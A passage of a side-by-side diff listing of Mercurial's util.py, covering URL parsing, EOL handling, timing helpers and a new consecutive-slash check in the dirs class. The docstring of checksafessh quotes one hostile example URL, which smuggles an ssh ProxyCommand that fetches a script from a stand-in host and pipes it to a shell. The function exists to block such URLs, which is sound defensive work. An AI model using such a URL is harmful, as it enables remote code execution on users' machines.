2662 2662 assert size >= 0
2663 2663 assert limit is None or limit >= 0
2664 2664 while True:
2665 2665 if limit is None:
2666 2666 nbytes = size
2667 2667 else:
2668 2668 nbytes = min(limit, size)
2669 2669 s = nbytes and f.read(nbytes)
2670 2670 if not s:
2671 2671 break
2672 2672 if limit:
2673 2673 limit -= len(s)
2674 2674 yield s
2675 2675
2676 2676
2677 2677 class cappedreader(object):
2678 2678 """A file object proxy that allows reading up to N bytes.
2679 2679
2680 2680 Given a source file object, instances of this type allow reading up to
2681 2681 N bytes from that source file object. Attempts to read past the allowed
2682 2682 limit are treated as EOF.
2683 2683
2684 2684 It is assumed that I/O is not performed on the original file object
2685 2685 in addition to I/O that is performed by this instance. If there is,
2686 2686 state tracking will get out of sync and unexpected results will ensue.
2687 2687 """
2688 2688
2689 2689 def __init__(self, fh, limit):
2690 2690 """Allow reading up to <limit> bytes from <fh>."""
2691 2691 self._fh = fh
2692 2692 self._left = limit
2693 2693
2694 2694 def read(self, n=-1):
2695 2695 if not self._left:
2696 2696 return b''
2697 2697
2698 2698 if n < 0:
2699 2699 n = self._left
2700 2700
2701 2701 data = self._fh.read(min(n, self._left))
2702 2702 self._left -= len(data)
2703 2703 assert self._left >= 0
2704 2704
2705 2705 return data
2706 2706
2707 2707 def readinto(self, b):
2708 2708 res = self.read(len(b))
2709 2709 if res is None:
2710 2710 return None
2711 2711
2712 2712 b[0 : len(res)] = res
2713 2713 return len(res)
2714 2714
2715 2715
2716 2716 def unitcountfn(*unittable):
2717 2717 '''return a function that renders a readable count of some quantity'''
2718 2718
2719 2719 def go(count):
2720 2720 for multiplier, divisor, format in unittable:
2721 2721 if abs(count) >= divisor * multiplier:
2722 2722 return format % (count / float(divisor))
2723 2723 return unittable[-1][2] % count
2724 2724
2725 2725 return go
2726 2726
2727 2727
2728 2728 def processlinerange(fromline, toline):
2729 2729 """Check that linerange <fromline>:<toline> makes sense and return a
2730 2730 0-based range.
2731 2731
2732 2732 >>> processlinerange(10, 20)
2733 2733 (9, 20)
2734 2734 >>> processlinerange(2, 1)
2735 2735 Traceback (most recent call last):
2736 2736 ...
2737 2737 ParseError: line range must be positive
2738 2738 >>> processlinerange(0, 5)
2739 2739 Traceback (most recent call last):
2740 2740 ...
2741 2741 ParseError: fromline must be strictly positive
2742 2742 """
2743 2743 if toline - fromline < 0:
2744 2744 raise error.ParseError(_(b"line range must be positive"))
2745 2745 if fromline < 1:
2746 2746 raise error.ParseError(_(b"fromline must be strictly positive"))
2747 2747 return fromline - 1, toline
2748 2748
2749 2749
2750 2750 bytecount = unitcountfn(
2751 2751 (100, 1 << 30, _(b'%.0f GB')),
2752 2752 (10, 1 << 30, _(b'%.1f GB')),
2753 2753 (1, 1 << 30, _(b'%.2f GB')),
2754 2754 (100, 1 << 20, _(b'%.0f MB')),
2755 2755 (10, 1 << 20, _(b'%.1f MB')),
2756 2756 (1, 1 << 20, _(b'%.2f MB')),
2757 2757 (100, 1 << 10, _(b'%.0f KB')),
2758 2758 (10, 1 << 10, _(b'%.1f KB')),
2759 2759 (1, 1 << 10, _(b'%.2f KB')),
2760 2760 (1, 1, _(b'%.0f bytes')),
2761 2761 )
2762 2762
2763 2763
2764 2764 class transformingwriter(object):
2765 2765 """Writable file wrapper to transform data by function"""
2766 2766
2767 2767 def __init__(self, fp, encode):
2768 2768 self._fp = fp
2769 2769 self._encode = encode
2770 2770
2771 2771 def close(self):
2772 2772 self._fp.close()
2773 2773
2774 2774 def flush(self):
2775 2775 self._fp.flush()
2776 2776
2777 2777 def write(self, data):
2778 2778 return self._fp.write(self._encode(data))
2779 2779
2780 2780
2781 2781 # Matches a single EOL which can either be a CRLF where repeated CR
2782 2782 # are removed or a LF. We do not care about old Macintosh files, so a
2783 2783 # stray CR is an error.
2784 2784 _eolre = remod.compile(br'\r*\n')
2785 2785
2786 2786
2787 2787 def tolf(s):
2788 2788 return _eolre.sub(b'\n', s)
2789 2789
2790 2790
2791 2791 def tocrlf(s):
2792 2792 return _eolre.sub(b'\r\n', s)
2793 2793
2794 2794
2795 2795 def _crlfwriter(fp):
2796 2796 return transformingwriter(fp, tocrlf)
2797 2797
2798 2798
2799 2799 if pycompat.oslinesep == b'\r\n':
2800 2800 tonativeeol = tocrlf
2801 2801 fromnativeeol = tolf
2802 2802 nativeeolwriter = _crlfwriter
2803 2803 else:
2804 2804 tonativeeol = pycompat.identity
2805 2805 fromnativeeol = pycompat.identity
2806 2806 nativeeolwriter = pycompat.identity
2807 2807
2808 2808 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2809 2809 3,
2810 2810 0,
2811 2811 ):
2812 2812 # There is an issue in CPython that some IO methods do not handle EINTR
2813 2813 # correctly. The following table shows what CPython version (and functions)
2814 2814 # are affected (buggy: has the EINTR bug, okay: otherwise):
2815 2815 #
2816 2816 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2817 2817 # --------------------------------------------------
2818 2818 # fp.__iter__ | buggy | buggy | okay
2819 2819 # fp.read* | buggy | okay [1] | okay
2820 2820 #
2821 2821 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2822 2822 #
2823 2823 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2824 2824 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2825 2825 #
2826 2826 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2827 2827 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2828 2828 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2829 2829 # fp.__iter__ but not other fp.read* methods.
2830 2830 #
2831 2831 # On modern systems like Linux, the "read" syscall cannot be interrupted
2832 2832 # when reading "fast" files like on-disk files. So the EINTR issue only
2833 2833 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2834 2834 # files approximately as "fast" files and use the fast (unsafe) code path,
2835 2835 # to minimize the performance impact.
2836 2836 if sys.version_info >= (2, 7, 4):
2837 2837 # fp.readline deals with EINTR correctly, use it as a workaround.
2838 2838 def _safeiterfile(fp):
2839 2839 return iter(fp.readline, b'')
2840 2840
2841 2841 else:
2842 2842 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2843 2843 # note: this may block longer than necessary because of bufsize.
2844 2844 def _safeiterfile(fp, bufsize=4096):
2845 2845 fd = fp.fileno()
2846 2846 line = b''
2847 2847 while True:
2848 2848 try:
2849 2849 buf = os.read(fd, bufsize)
2850 2850 except OSError as ex:
2851 2851 # os.read only raises EINTR before any data is read
2852 2852 if ex.errno == errno.EINTR:
2853 2853 continue
2854 2854 else:
2855 2855 raise
2856 2856 line += buf
2857 2857 if b'\n' in buf:
2858 2858 splitted = line.splitlines(True)
2859 2859 line = b''
2860 2860 for l in splitted:
2861 2861 if l[-1] == b'\n':
2862 2862 yield l
2863 2863 else:
2864 2864 line = l
2865 2865 if not buf:
2866 2866 break
2867 2867 if line:
2868 2868 yield line
2869 2869
2870 2870 def iterfile(fp):
2871 2871 fastpath = True
2872 2872 if type(fp) is file:
2873 2873 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2874 2874 if fastpath:
2875 2875 return fp
2876 2876 else:
2877 2877 return _safeiterfile(fp)
2878 2878
2879 2879
2880 2880 else:
2881 2881 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2882 2882 def iterfile(fp):
2883 2883 return fp
2884 2884
2885 2885
2886 2886 def iterlines(iterator):
2887 2887 for chunk in iterator:
2888 2888 for line in chunk.splitlines():
2889 2889 yield line
2890 2890
2891 2891
2892 2892 def expandpath(path):
2893 2893 return os.path.expanduser(os.path.expandvars(path))
2894 2894
2895 2895
2896 2896 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2897 2897 """Return the result of interpolating items in the mapping into string s.
2898 2898
2899 2899 prefix is a single character string, or a two character string with
2900 2900 a backslash as the first character if the prefix needs to be escaped in
2901 2901 a regular expression.
2902 2902
2903 2903 fn is an optional function that will be applied to the replacement text
2904 2904 just before replacement.
2905 2905
2906 2906 escape_prefix is an optional flag that allows using doubled prefix for
2907 2907 its escaping.
2908 2908 """
2909 2909 fn = fn or (lambda s: s)
2910 2910 patterns = b'|'.join(mapping.keys())
2911 2911 if escape_prefix:
2912 2912 patterns += b'|' + prefix
2913 2913 if len(prefix) > 1:
2914 2914 prefix_char = prefix[1:]
2915 2915 else:
2916 2916 prefix_char = prefix
2917 2917 mapping[prefix_char] = prefix_char
2918 2918 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2919 2919 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2920 2920
2921 2921
2922 2922 def getport(port):
2923 2923 """Return the port for a given network service.
2924 2924
2925 2925 If port is an integer, it's returned as is. If it's a string, it's
2926 2926 looked up using socket.getservbyname(). If there's no matching
2927 2927 service, error.Abort is raised.
2928 2928 """
2929 2929 try:
2930 2930 return int(port)
2931 2931 except ValueError:
2932 2932 pass
2933 2933
2934 2934 try:
2935 2935 return socket.getservbyname(pycompat.sysstr(port))
2936 2936 except socket.error:
2937 2937 raise error.Abort(
2938 2938 _(b"no port number associated with service '%s'") % port
2939 2939 )
2940 2940
2941 2941
2942 2942 class url(object):
2943 2943 r"""Reliable URL parser.
2944 2944
2945 2945 This parses URLs and provides attributes for the following
2946 2946 components:
2947 2947
2948 2948 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2949 2949
2950 2950 Missing components are set to None. The only exception is
2951 2951 fragment, which is set to '' if present but empty.
2952 2952
2953 2953 If parsefragment is False, fragment is included in query. If
2954 2954 parsequery is False, query is included in path. If both are
2955 2955 False, both fragment and query are included in path.
2956 2956
2957 2957 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2958 2958
2959 2959 Note that for backward compatibility reasons, bundle URLs do not
2960 2960 take host names. That means 'bundle://../' has a path of '../'.
2961 2961
2962 2962 Examples:
2963 2963
2964 2964 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2965 2965 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2966 2966 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2967 2967 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2968 2968 >>> url(b'file:///home/joe/repo')
2969 2969 <url scheme: 'file', path: '/home/joe/repo'>
2970 2970 >>> url(b'file:///c:/temp/foo/')
2971 2971 <url scheme: 'file', path: 'c:/temp/foo/'>
2972 2972 >>> url(b'bundle:foo')
2973 2973 <url scheme: 'bundle', path: 'foo'>
2974 2974 >>> url(b'bundle://../foo')
2975 2975 <url scheme: 'bundle', path: '../foo'>
2976 2976 >>> url(br'c:\foo\bar')
2977 2977 <url path: 'c:\\foo\\bar'>
2978 2978 >>> url(br'\\blah\blah\blah')
2979 2979 <url path: '\\\\blah\\blah\\blah'>
2980 2980 >>> url(br'\\blah\blah\blah#baz')
2981 2981 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2982 2982 >>> url(br'file:///C:\users\me')
2983 2983 <url scheme: 'file', path: 'C:\\users\\me'>
2984 2984
2985 2985 Authentication credentials:
2986 2986
2987 2987 >>> url(b'ssh://joe:xyz@x/repo')
2988 2988 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2989 2989 >>> url(b'ssh://joe@x/repo')
2990 2990 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2991 2991
2992 2992 Query strings and fragments:
2993 2993
2994 2994 >>> url(b'http://host/a?b#c')
2995 2995 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2996 2996 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2997 2997 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2998 2998
2999 2999 Empty path:
3000 3000
3001 3001 >>> url(b'')
3002 3002 <url path: ''>
3003 3003 >>> url(b'#a')
3004 3004 <url path: '', fragment: 'a'>
3005 3005 >>> url(b'http://host/')
3006 3006 <url scheme: 'http', host: 'host', path: ''>
3007 3007 >>> url(b'http://host/#a')
3008 3008 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3009 3009
3010 3010 Only scheme:
3011 3011
3012 3012 >>> url(b'http:')
3013 3013 <url scheme: 'http'>
3014 3014 """
3015 3015
3016 3016 _safechars = b"!~*'()+"
3017 3017 _safepchars = b"/!~*'()+:\\"
3018 3018 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3019 3019
3020 3020 def __init__(self, path, parsequery=True, parsefragment=True):
3021 3021 # We slowly chomp away at path until we have only the path left
3022 3022 self.scheme = self.user = self.passwd = self.host = None
3023 3023 self.port = self.path = self.query = self.fragment = None
3024 3024 self._localpath = True
3025 3025 self._hostport = b''
3026 3026 self._origpath = path
3027 3027
3028 3028 if parsefragment and b'#' in path:
3029 3029 path, self.fragment = path.split(b'#', 1)
3030 3030
3031 3031 # special case for Windows drive letters and UNC paths
3032 3032 if hasdriveletter(path) or path.startswith(b'\\\\'):
3033 3033 self.path = path
3034 3034 return
3035 3035
3036 3036 # For compatibility reasons, we can't handle bundle paths as
3037 3037 # normal URLS
3038 3038 if path.startswith(b'bundle:'):
3039 3039 self.scheme = b'bundle'
3040 3040 path = path[7:]
3041 3041 if path.startswith(b'//'):
3042 3042 path = path[2:]
3043 3043 self.path = path
3044 3044 return
3045 3045
3046 3046 if self._matchscheme(path):
3047 3047 parts = path.split(b':', 1)
3048 3048 if parts[0]:
3049 3049 self.scheme, path = parts
3050 3050 self._localpath = False
3051 3051
3052 3052 if not path:
3053 3053 path = None
3054 3054 if self._localpath:
3055 3055 self.path = b''
3056 3056 return
3057 3057 else:
3058 3058 if self._localpath:
3059 3059 self.path = path
3060 3060 return
3061 3061
3062 3062 if parsequery and b'?' in path:
3063 3063 path, self.query = path.split(b'?', 1)
3064 3064 if not path:
3065 3065 path = None
3066 3066 if not self.query:
3067 3067 self.query = None
3068 3068
3069 3069 # // is required to specify a host/authority
3070 3070 if path and path.startswith(b'//'):
3071 3071 parts = path[2:].split(b'/', 1)
3072 3072 if len(parts) > 1:
3073 3073 self.host, path = parts
3074 3074 else:
3075 3075 self.host = parts[0]
3076 3076 path = None
3077 3077 if not self.host:
3078 3078 self.host = None
3079 3079 # path of file:///d is /d
3080 3080 # path of file:///d:/ is d:/, not /d:/
3081 3081 if path and not hasdriveletter(path):
3082 3082 path = b'/' + path
3083 3083
3084 3084 if self.host and b'@' in self.host:
3085 3085 self.user, self.host = self.host.rsplit(b'@', 1)
3086 3086 if b':' in self.user:
3087 3087 self.user, self.passwd = self.user.split(b':', 1)
3088 3088 if not self.host:
3089 3089 self.host = None
3090 3090
3091 3091 # Don't split on colons in IPv6 addresses without ports
3092 3092 if (
3093 3093 self.host
3094 3094 and b':' in self.host
3095 3095 and not (
3096 3096 self.host.startswith(b'[') and self.host.endswith(b']')
3097 3097 )
3098 3098 ):
3099 3099 self._hostport = self.host
3100 3100 self.host, self.port = self.host.rsplit(b':', 1)
3101 3101 if not self.host:
3102 3102 self.host = None
3103 3103
3104 3104 if (
3105 3105 self.host
3106 3106 and self.scheme == b'file'
3107 3107 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3108 3108 ):
3109 3109 raise error.Abort(
3110 3110 _(b'file:// URLs can only refer to localhost')
3111 3111 )
3112 3112
3113 3113 self.path = path
3114 3114
3115 3115 # leave the query string escaped
3116 3116 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3117 3117 v = getattr(self, a)
3118 3118 if v is not None:
3119 3119 setattr(self, a, urlreq.unquote(v))
3120 3120
3121 3121 @encoding.strmethod
3122 3122 def __repr__(self):
3123 3123 attrs = []
3124 3124 for a in (
3125 3125 b'scheme',
3126 3126 b'user',
3127 3127 b'passwd',
3128 3128 b'host',
3129 3129 b'port',
3130 3130 b'path',
3131 3131 b'query',
3132 3132 b'fragment',
3133 3133 ):
3134 3134 v = getattr(self, a)
3135 3135 if v is not None:
3136 3136 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3137 3137 return b'<url %s>' % b', '.join(attrs)
3138 3138
3139 3139 def __bytes__(self):
3140 3140 r"""Join the URL's components back into a URL string.
3141 3141
3142 3142 Examples:
3143 3143
3144 3144 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3145 3145 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3146 3146 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3147 3147 'http://user:pw@host:80/?foo=bar&baz=42'
3148 3148 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3149 3149 'http://user:pw@host:80/?foo=bar%3dbaz'
3150 3150 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3151 3151 'ssh://user:pw@[::1]:2200//home/joe#'
3152 3152 >>> bytes(url(b'http://localhost:80//'))
3153 3153 'http://localhost:80//'
3154 3154 >>> bytes(url(b'http://localhost:80/'))
3155 3155 'http://localhost:80/'
3156 3156 >>> bytes(url(b'http://localhost:80'))
3157 3157 'http://localhost:80/'
3158 3158 >>> bytes(url(b'bundle:foo'))
3159 3159 'bundle:foo'
3160 3160 >>> bytes(url(b'bundle://../foo'))
3161 3161 'bundle:../foo'
3162 3162 >>> bytes(url(b'path'))
3163 3163 'path'
3164 3164 >>> bytes(url(b'file:///tmp/foo/bar'))
3165 3165 'file:///tmp/foo/bar'
3166 3166 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3167 3167 'file:///c:/tmp/foo/bar'
3168 3168 >>> print(url(br'bundle:foo\bar'))
3169 3169 bundle:foo\bar
3170 3170 >>> print(url(br'file:///D:\data\hg'))
3171 3171 file:///D:\data\hg
3172 3172 """
3173 3173 if self._localpath:
3174 3174 s = self.path
3175 3175 if self.scheme == b'bundle':
3176 3176 s = b'bundle:' + s
3177 3177 if self.fragment:
3178 3178 s += b'#' + self.fragment
3179 3179 return s
3180 3180
3181 3181 s = self.scheme + b':'
3182 3182 if self.user or self.passwd or self.host:
3183 3183 s += b'//'
3184 3184 elif self.scheme and (
3185 3185 not self.path
3186 3186 or self.path.startswith(b'/')
3187 3187 or hasdriveletter(self.path)
3188 3188 ):
3189 3189 s += b'//'
3190 3190 if hasdriveletter(self.path):
3191 3191 s += b'/'
3192 3192 if self.user:
3193 3193 s += urlreq.quote(self.user, safe=self._safechars)
3194 3194 if self.passwd:
3195 3195 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3196 3196 if self.user or self.passwd:
3197 3197 s += b'@'
3198 3198 if self.host:
3199 3199 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3200 3200 s += urlreq.quote(self.host)
3201 3201 else:
3202 3202 s += self.host
3203 3203 if self.port:
3204 3204 s += b':' + urlreq.quote(self.port)
3205 3205 if self.host:
3206 3206 s += b'/'
3207 3207 if self.path:
3208 3208 # TODO: similar to the query string, we should not unescape the
3209 3209 # path when we store it, the path might contain '%2f' = '/',
3210 3210 # which we should *not* escape.
3211 3211 s += urlreq.quote(self.path, safe=self._safepchars)
3212 3212 if self.query:
3213 3213 # we store the query in escaped form.
3214 3214 s += b'?' + self.query
3215 3215 if self.fragment is not None:
3216 3216 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3217 3217 return s
3218 3218
3219 3219 __str__ = encoding.strmethod(__bytes__)
3220 3220
3221 3221 def authinfo(self):
3222 3222 user, passwd = self.user, self.passwd
3223 3223 try:
3224 3224 self.user, self.passwd = None, None
3225 3225 s = bytes(self)
3226 3226 finally:
3227 3227 self.user, self.passwd = user, passwd
3228 3228 if not self.user:
3229 3229 return (s, None)
3230 3230 # authinfo[1] is passed to urllib2 password manager, and its
3231 3231 # URIs must not contain credentials. The host is passed in the
3232 3232 # URIs list because Python < 2.4.3 uses only that to search for
3233 3233 # a password.
3234 3234 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3235 3235
3236 3236 def isabs(self):
3237 3237 if self.scheme and self.scheme != b'file':
3238 3238 return True # remote URL
3239 3239 if hasdriveletter(self.path):
3240 3240 return True # absolute for our purposes - can't be joined()
3241 3241 if self.path.startswith(br'\\'):
3242 3242 return True # Windows UNC path
3243 3243 if self.path.startswith(b'/'):
3244 3244 return True # POSIX-style
3245 3245 return False
3246 3246
3247 3247 def localpath(self):
3248 3248 if self.scheme == b'file' or self.scheme == b'bundle':
3249 3249 path = self.path or b'/'
3250 3250 # For Windows, we need to promote hosts containing drive
3251 3251 # letters to paths with drive letters.
3252 3252 if hasdriveletter(self._hostport):
3253 3253 path = self._hostport + b'/' + self.path
3254 3254 elif (
3255 3255 self.host is not None and self.path and not hasdriveletter(path)
3256 3256 ):
3257 3257 path = b'/' + path
3258 3258 return path
3259 3259 return self._origpath
3260 3260
3261 3261 def islocal(self):
3262 3262 '''whether localpath will return something that posixfile can open'''
3263 3263 return (
3264 3264 not self.scheme
3265 3265 or self.scheme == b'file'
3266 3266 or self.scheme == b'bundle'
3267 3267 )
3268 3268
3269 3269
3270 3270 def hasscheme(path):
3271 3271 return bool(url(path).scheme)
3272 3272
3273 3273
3274 3274 def hasdriveletter(path):
3275 3275 return path and path[1:2] == b':' and path[0:1].isalpha()
3276 3276
3277 3277
3278 3278 def urllocalpath(path):
3279 3279 return url(path, parsequery=False, parsefragment=False).localpath()
3280 3280
3281 3281
3282 3282 def checksafessh(path):
3283 3283 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3284 3284
3285 3285 This is a sanity check for ssh urls. ssh will parse the first item as
3286 3286 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3287 3287 Let's prevent these potentially exploited urls entirely and warn the
3288 3288 user.
3289 3289
3290 3290 Raises an error.Abort when the url is unsafe.
3291 3291 """
3292 3292 path = urlreq.unquote(path)
3293 3293 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3294 3294 raise error.Abort(
3295 3295 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3296 3296 )
3297 3297
3298 3298
3299 3299 def hidepassword(u):
3300 3300 '''hide user credential in a url string'''
3301 3301 u = url(u)
3302 3302 if u.passwd:
3303 3303 u.passwd = b'***'
3304 3304 return bytes(u)
3305 3305
3306 3306
3307 3307 def removeauth(u):
3308 3308 '''remove all authentication information from a url string'''
3309 3309 u = url(u)
3310 3310 u.user = u.passwd = None
3311 3311 return bytes(u)
3312 3312
3313 3313
3314 3314 timecount = unitcountfn(
3315 3315 (1, 1e3, _(b'%.0f s')),
3316 3316 (100, 1, _(b'%.1f s')),
3317 3317 (10, 1, _(b'%.2f s')),
3318 3318 (1, 1, _(b'%.3f s')),
3319 3319 (100, 0.001, _(b'%.1f ms')),
3320 3320 (10, 0.001, _(b'%.2f ms')),
3321 3321 (1, 0.001, _(b'%.3f ms')),
3322 3322 (100, 0.000001, _(b'%.1f us')),
3323 3323 (10, 0.000001, _(b'%.2f us')),
3324 3324 (1, 0.000001, _(b'%.3f us')),
3325 3325 (100, 0.000000001, _(b'%.1f ns')),
3326 3326 (10, 0.000000001, _(b'%.2f ns')),
3327 3327 (1, 0.000000001, _(b'%.3f ns')),
3328 3328 )
3329 3329
3330 3330
3331 3331 @attr.s
3332 3332 class timedcmstats(object):
3333 3333 """Stats information produced by the timedcm context manager on entering."""
3334 3334
3335 3335 # the starting value of the timer as a float (meaning and resulution is
3336 3336 # platform dependent, see util.timer)
3337 3337 start = attr.ib(default=attr.Factory(lambda: timer()))
3338 3338 # the number of seconds as a floating point value; starts at 0, updated when
3339 3339 # the context is exited.
3340 3340 elapsed = attr.ib(default=0)
3341 3341 # the number of nested timedcm context managers.
3342 3342 level = attr.ib(default=1)
3343 3343
3344 3344 def __bytes__(self):
3345 3345 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3346 3346
3347 3347 __str__ = encoding.strmethod(__bytes__)
3348 3348
3349 3349
3350 3350 @contextlib.contextmanager
3351 3351 def timedcm(whencefmt, *whenceargs):
3352 3352 """A context manager that produces timing information for a given context.
3353 3353
3354 3354 On entering a timedcmstats instance is produced.
3355 3355
3356 3356 This context manager is reentrant.
3357 3357
3358 3358 """
3359 3359 # track nested context managers
3360 3360 timedcm._nested += 1
3361 3361 timing_stats = timedcmstats(level=timedcm._nested)
3362 3362 try:
3363 3363 with tracing.log(whencefmt, *whenceargs):
3364 3364 yield timing_stats
3365 3365 finally:
3366 3366 timing_stats.elapsed = timer() - timing_stats.start
3367 3367 timedcm._nested -= 1
3368 3368
3369 3369
3370 3370 timedcm._nested = 0
3371 3371
3372 3372
3373 3373 def timed(func):
3374 3374 '''Report the execution time of a function call to stderr.
3375 3375
3376 3376 During development, use as a decorator when you need to measure
3377 3377 the cost of a function, e.g. as follows:
3378 3378
3379 3379 @util.timed
3380 3380 def foo(a, b, c):
3381 3381 pass
3382 3382 '''
3383 3383
3384 3384 def wrapper(*args, **kwargs):
3385 3385 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3386 3386 result = func(*args, **kwargs)
3387 3387 stderr = procutil.stderr
3388 3388 stderr.write(
3389 3389 b'%s%s: %s\n'
3390 3390 % (
3391 3391 b' ' * time_stats.level * 2,
3392 3392 pycompat.bytestr(func.__name__),
3393 3393 time_stats,
3394 3394 )
3395 3395 )
3396 3396 return result
3397 3397
3398 3398 return wrapper
3399 3399
3400 3400
3401 3401 _sizeunits = (
3402 3402 (b'm', 2 ** 20),
3403 3403 (b'k', 2 ** 10),
3404 3404 (b'g', 2 ** 30),
3405 3405 (b'kb', 2 ** 10),
3406 3406 (b'mb', 2 ** 20),
3407 3407 (b'gb', 2 ** 30),
3408 3408 (b'b', 1),
3409 3409 )
3410 3410
3411 3411
3412 3412 def sizetoint(s):
3413 3413 '''Convert a space specifier to a byte count.
3414 3414
3415 3415 >>> sizetoint(b'30')
3416 3416 30
3417 3417 >>> sizetoint(b'2.2kb')
3418 3418 2252
3419 3419 >>> sizetoint(b'6M')
3420 3420 6291456
3421 3421 '''
3422 3422 t = s.strip().lower()
3423 3423 try:
3424 3424 for k, u in _sizeunits:
3425 3425 if t.endswith(k):
3426 3426 return int(float(t[: -len(k)]) * u)
3427 3427 return int(t)
3428 3428 except ValueError:
3429 3429 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3430 3430
3431 3431
3432 3432 class hooks(object):
3433 3433 '''A collection of hook functions that can be used to extend a
3434 3434 function's behavior. Hooks are called in lexicographic order,
3435 3435 based on the names of their sources.'''
3436 3436
3437 3437 def __init__(self):
3438 3438 self._hooks = []
3439 3439
3440 3440 def add(self, source, hook):
3441 3441 self._hooks.append((source, hook))
3442 3442
3443 3443 def __call__(self, *args):
3444 3444 self._hooks.sort(key=lambda x: x[0])
3445 3445 results = []
3446 3446 for source, hook in self._hooks:
3447 3447 results.append(hook(*args))
3448 3448 return results
3449 3449
3450 3450
3451 3451 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3452 3452 '''Yields lines for a nicely formatted stacktrace.
3453 3453 Skips the 'skip' last entries, then return the last 'depth' entries.
3454 3454 Each file+linenumber is formatted according to fileline.
3455 3455 Each line is formatted according to line.
3456 3456 If line is None, it yields:
3457 3457 length of longest filepath+line number,
3458 3458 filepath+linenumber,
3459 3459 function
3460 3460
3461 3461 Not be used in production code but very convenient while developing.
3462 3462 '''
3463 3463 entries = [
3464 3464 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3465 3465 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3466 3466 ][-depth:]
3467 3467 if entries:
3468 3468 fnmax = max(len(entry[0]) for entry in entries)
3469 3469 for fnln, func in entries:
3470 3470 if line is None:
3471 3471 yield (fnmax, fnln, func)
3472 3472 else:
3473 3473 yield line % (fnmax, fnln, func)
3474 3474
3475 3475
3476 3476 def debugstacktrace(
3477 3477 msg=b'stacktrace',
3478 3478 skip=0,
3479 3479 f=procutil.stderr,
3480 3480 otherf=procutil.stdout,
3481 3481 depth=0,
3482 3482 ):
3483 3483 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3484 3484 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3485 3485 By default it will flush stdout first.
3486 3486 It can be used everywhere and intentionally does not require an ui object.
3487 3487 Not be used in production code but very convenient while developing.
3488 3488 '''
3489 3489 if otherf:
3490 3490 otherf.flush()
3491 3491 f.write(b'%s at:\n' % msg.rstrip())
3492 3492 for line in getstackframes(skip + 1, depth=depth):
3493 3493 f.write(line)
3494 3494 f.flush()
3495 3495
3496 3496
3497 3497 class dirs(object):
3498 3498 '''a multiset of directory names from a dirstate or manifest'''
3499 3499
3500 3500 def __init__(self, map, skip=None):
3501 3501 self._dirs = {}
3502 3502 addpath = self.addpath
3503 3503 if isinstance(map, dict) and skip is not None:
3504 3504 for f, s in pycompat.iteritems(map):
3505 3505 if s[0] != skip:
3506 3506 addpath(f)
3507 3507 elif skip is not None:
3508 3508 raise error.ProgrammingError(
3509 3509 b"skip character is only supported with a dict source"
3510 3510 )
3511 3511 else:
3512 3512 for f in map:
3513 3513 addpath(f)
3514 3514
3515 3515 def addpath(self, path):
3516 3516 dirs = self._dirs
3517 3517 for base in finddirs(path):
3518 if base.endswith(b'/'):
3519 raise ValueError(
3520 "found invalid consecutive slashes in path: %r" % base
3521 )
3518 3522 if base in dirs:
3519 3523 dirs[base] += 1
3520 3524 return
3521 3525 dirs[base] = 1
3522 3526
3523 3527 def delpath(self, path):
3524 3528 dirs = self._dirs
3525 3529 for base in finddirs(path):
3526 3530 if dirs[base] > 1:
3527 3531 dirs[base] -= 1
3528 3532 return
3529 3533 del dirs[base]
3530 3534
3531 3535 def __iter__(self):
